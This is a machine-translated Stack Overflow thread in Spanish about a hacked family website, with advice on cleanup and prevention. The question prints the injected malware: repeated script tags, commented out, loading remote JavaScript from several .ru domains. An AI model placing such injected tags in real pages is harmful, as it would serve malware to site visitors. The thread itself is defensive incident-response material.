Mi sitio web fue pirateado...¿Qué tengo que hacer?[cerrado]
https://stackoverflow.com/questions/2970
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
RussianPregunta
Mi papá me llamó hoy y me dijo que las personas que visitaban su sitio web estaban recibiendo 168 virus al intentar descargarlos en sus computadoras.No es nada técnico y construyó todo con un editor WYSIWYG.
Abrí su sitio y vi la fuente, y había una línea de Javascript incluido en la parte inferior de la fuente justo antes de la etiqueta HTML de cierre.Incluyeron este archivo (entre muchos otros): http://www.98hs.ru/js.js <-- APAGUE JAVASCRIPT ANTES DE IR A ESA URL.
Así que lo comenté por ahora.Resulta que su contraseña FTP era una simple palabra del diccionario de seis letras, así que creemos que así fue como fue pirateada.Hemos cambiado su contraseña a una cadena sin palabras de más de 8 dígitos (no usaría una frase de contraseña ya que es un tecleador de caza y picoteo).
hice un whois en 98hs.ru y descubrí que está alojado en un servidor en Chile.En realidad, también hay una dirección de correo electrónico asociada, pero dudo seriamente que esta persona sea la culpable.Probablemente sea algún otro sitio que fue pirateado...
No tengo idea de qué hacer en este momento, ya que nunca antes había lidiado con este tipo de cosas.¿Alguien tiene alguna sugerencia?
Estaba usando ftp no seguro simple a través de webhost4life.com.Ni siquiera veo una manera de hacer sftp en su sitio.¿Estoy pensando que su nombre de usuario y contraseña fueron interceptados?
Entonces, para que esto sea más relevante para la comunidad, ¿cuáles son los pasos que debe seguir/las mejores prácticas que debe seguir para proteger su sitio web contra ataques?
Para que conste, aquí está la línea de código que "mágicamente" se agregó a su archivo (y no está en el archivo de su computadora; la dejé comentada solo para estar absolutamente seguro de que no hará nada). en esta página, aunque estoy seguro de que Jeff se protegería contra esto):
<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
Solución
Intente recopilar tanta información como pueda.Vea si el anfitrión puede brindarle un registro que muestre todas las conexiones FTP que se realizaron en su cuenta.Puede usarlos para ver si fue incluso una conexión FTP la que se usó para realizar el cambio y posiblemente obtener una dirección IP.
Si está utilizando un software preempaquetado como Wordpress, Drupal o cualquier otro que no haya codificado, puede haber vulnerabilidades en el código de carga que permitan este tipo de modificación.Si está personalizado, verifique todos los lugares donde permita a los usuarios cargar archivos o modificar archivos existentes.
Lo segundo sería hacer un volcado del sitio tal como está y verificar todo en busca de otras modificaciones.Puede que sea solo una modificación que hicieron, pero si ingresaron a través de FTP, quién sabe qué más hay ahí arriba.
Revierta su sitio a un buen estado conocido y, si es necesario, actualícelo a la última versión.
También hay un nivel de rentabilidad que debes tener en cuenta.¿Vale la pena intentar localizar a la persona por el daño o es algo en lo que simplemente vives, aprendes y usas contraseñas más seguras?
Otros consejos
Sé que esto es un poco tarde en el juego, pero la URL mencionada para JavaScript se menciona en una lista de sitios que se sabe que han sido parte del resurgimiento del bot ASPRox que comenzó en junio (al menos fue entonces cuando nos marcaron con él).Algunos detalles al respecto se mencionan a continuación:
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
Lo desagradable de esto es que efectivamente cada campo de tipo varchar en la base de datos está "infectado" para generar una referencia a esta URL, en la que el navegador obtiene un pequeño iframe que lo convierte en un bot.Puede encontrar una solución SQL básica para esto aquí:
http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx
Sin embargo, lo aterrador es que el virus busca en las tablas del sistema valores para infectar y muchos planes de alojamiento compartido también comparten el espacio de la base de datos para sus clientes.Así que lo más probable es que ni siquiera fuera el sitio de tu padre el que estaba infectado, sino el sitio de otra persona dentro de su clúster de alojamiento que escribió un código deficiente y abrió la puerta al ataque de inyección SQL.
Si aún no lo ha hecho, enviaría un correo electrónico URGENTE a su anfitrión y les daría un enlace a ese código SQL para reparar todo el sistema.Puedes arreglar tus propias tablas de bases de datos afectadas, pero lo más probable es que los robots que están infectando pasen por ese agujero nuevamente e infecten todo.
Con suerte, esto le brindará más información con la que trabajar.
EDITAR:Un pensamiento rápido más: si está utilizando una de las herramientas de diseño en línea del host para crear su sitio web, todo ese contenido probablemente esté en una columna y haya sido infectado de esa manera.
Mencionas que tu papá estaba usando una herramienta de publicación de sitios web.
Si la herramienta de publicación publica desde su computadora en el servidor, puede darse el caso de que sus archivos locales estén limpios y que solo necesite volver a publicarlos en el servidor.
Sin embargo, debería ver si hay un método de inicio de sesión diferente en su servidor que el simple FTP...eso no es muy seguro porque envía su contraseña como texto sin cifrar a través de Internet.
Con una contraseña de seis caracteres, es posible que haya sido forzado brutalmente.Esto es más probable que interceptar su ftp, pero también podría ser eso.
Comience con una contraseña más segura.(8 caracteres todavía son bastante débiles)
A ver si este enlace a internet blog de seguridad es útil.
¿El sitio es simplemente HTML estático?es decir.¿No ha logrado codificar una página de carga que permita a cualquiera que pase por allí cargar scripts/páginas comprometidas?
¿Por qué no preguntarle a webhost4life si tienen registros FTP disponibles y reportarles el problema?Nunca se sabe, pueden ser bastante receptivos y descubrir exactamente qué pasó.
Trabajo para un proveedor de alojamiento compartido y siempre agradecemos informes como estos y, por lo general, podemos identificar el vector exacto del ataque y aconsejar dónde se equivocó el cliente.
Desenchufe el servidor web sin apagarlo para evitar secuencias de comandos de apagado.Analice el disco duro a través de otra computadora como unidad de datos y vea si puede determinar al culpable a través de archivos de registro y cosas de esa naturaleza.Verifique que el código sea seguro y luego restáurelo desde una copia de seguridad.
Esto le sucedió recientemente a un cliente mío que estaba alojado en ipower.No estoy seguro de si su entorno de alojamiento estaba basado en Apache, pero si lo estaba, asegúrese de verificar dos veces los archivos .htaccess que no creó, particularmente encima de la raíz web y dentro de los directorios de imágenes, ya que tienden a inyectar algo de maldad allí. también (estaban redirigiendo a las personas dependiendo de dónde venían en la referencia).También verifique cualquier código que haya creado que no haya escrito.
¡Aparentemente nos habían hackeado los mismos chicos!O bots, en nuestro caso.Usaron inyección SQL en URL en algunos sitios ASP clásicos antiguos que ya nadie mantiene.Encontramos IP atacantes y las bloqueamos en IIS.Ahora debemos refactorizar todos los ASP antiguos.Por lo tanto, mi consejo es que primero eche un vistazo a los registros de IIS para determinar si el problema está en el código de su sitio o en la configuración del servidor.
